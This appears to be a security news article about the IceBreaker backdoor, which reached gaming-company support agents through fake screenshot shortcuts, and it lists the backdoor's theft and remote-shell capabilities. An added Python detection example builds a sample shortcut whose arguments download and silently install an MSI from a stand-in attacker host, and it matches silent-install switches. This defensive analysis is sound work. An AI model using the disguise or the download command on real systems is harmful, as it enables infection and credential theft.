  • Hackers Use New IceBreaker Malware to Hack Gaming Companies


    Social engineering is in demand once again; this time the attackers are fooling support agents.

    Hacker groups have targeted online game development companies with a never-before-seen backdoor that the researchers have dubbed "IceBreaker".

    The Security Joes Incident Response team believes that the IceBreaker backdoor relies on "a very specific social engineering technique" built around deceiving support agents. An attacker poses as a user who has run into a problem and sends a "screenshot" to an employee in the support chat. The agent, whose job is to help the user, has little choice but to download and open the file, and that is how the agent's own computer becomes infected.

    The name of the group behind these attacks is still unknown. According to Security Joes, however, the group has been using this approach since at least September 2022. So far, the only public evidence of IceBreaker in use is an October Twitter post from MalwareHunterTeam.

    The malicious image is usually hosted on a fake website that imitates one of the popular image-hosting services, although the researchers also saw malicious screenshots stored in ordinary Dropbox storage.

    The "image" itself is actually a malicious ".lnk" file: an ordinary Windows shortcut whose command-line parameters carry the malicious code.


    As you can see in the image above, the shortcut icon has been changed to look innocuous. The shortcut contains a command to download the payload in ".msi" format from the attacker's server, install it silently, and run it without a user interface.
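    The disguise described above, a Windows shortcut whose name and icon say "image" while its parameters fetch an MSI, can be checked for on the defender's side by parsing the Shell Link binary format directly. The following is an added example, not code from the Security Joes report: the .lnk sample, the download URL and the icon path are constructed for illustration, and the detection rules (image-like name, MSI reference, URL, silent-install switch) are this example's own heuristics rather than anything the report publishes.

```python
import struct
# MS-SHLLINK format constants; the sample file, URL and icon path are constructed here.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 1 << 0, 1 << 1, 1 << 7
STRING_KEYS = ("name", "relative_path", "working_dir", "arguments", "icon_location")  # LinkFlags bits 2..6
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif", ".bmp")

def lnk_string(text):
    # StringData entry: 2-byte character count, then UTF-16LE text, no terminator.
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")

def build_sample_lnk():
    # Minimal .lnk: 76-byte header (attributes and timestamps zeroed) plus StringData.
    flags = (1 << 2) | (1 << 5) | (1 << 6) | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags).ljust(0x4C, b"\0")
    return (header + lnk_string("screenshot")
            + lnk_string("/i https://attacker.invalid/payload.msi /qn")  # hypothetical
            + lnk_string("%SystemRoot%\\System32\\imageres.dll"))  # borrowed image icon

def parse_lnk(data):
    # Return the StringData fields of a Shell Link, or None if the magic does not match.
    if len(data) < 0x4C or data[:4] != b"\x4c\0\0\0" or data[4:20] != LNK_CLSID:
        return None
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_IDLIST:    # LinkTargetIDList: size prefix excludes itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:  # LinkInfo: size prefix includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    fields = {}
    for i, key in enumerate(STRING_KEYS):
        if flags & (1 << (i + 2)):
            count, pos = struct.unpack_from("<H", data, pos)[0], pos + 2
            raw, pos = data[pos:pos + count * width], pos + count * width
            fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return fields

def triage_attachment(filename, data):
    # Flag a chat attachment that is really a shortcut, and what its arguments do.
    fields = parse_lnk(data)
    stem = filename.lower().removesuffix(".lnk")
    args = (fields or {}).get("arguments", "").lower()
    checks = (
        (fields is not None and stem.endswith(IMAGE_EXTS), "image-named file is a Shell Link"),
        (".msi" in args or "msiexec" in args, "arguments reference an MSI package"),
        ("http://" in args or "https://" in args, "arguments contain a download URL"),
        (bool({"/q", "/qn", "/quiet"} & set(args.split())), "silent-install switch present"),
    )
    return [msg for hit, msg in checks if hit]
```

Run `triage_attachment("screenshot.png.lnk", build_sample_lnk())` to see all four findings fire on the constructed sample, while a genuine PNG returns an empty list because its magic bytes are not a Shell Link header.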

    The installer then drops the malicious application "Port.exe", a 64-bit C++ executable, under "AppData\Local\Temp".


    After careful analysis, Security Joes found that the sample is a completely new backdoor written in Node.js. It gives the attackers the following capabilities:

    extending the backdoor with plugins that add to its built-in functions;
    adding the backdoor to Windows startup for persistence;
    enumerating Windows processes;
    stealing passwords and cookies from local storage, in particular from Google Chrome;
    enabling a Socks5 reverse proxy;
    uploading files to a remote server over web sockets;
    running custom VBS scripts;
    taking screenshots;
    opening remote shell sessions.

    If the target organization runs its customer support in-house rather than outsourcing it to an external provider, the attackers can use the backdoor to steal credentials, move laterally through the internal network and expand their foothold in it.

    Currently, not much is known about IceBreaker, but Security Joes decided to publish this report and share all the indicators of compromise (IoC) found to help antivirus companies learn how to identify and eliminate the threat in a timely manner.

    Author DeepWeb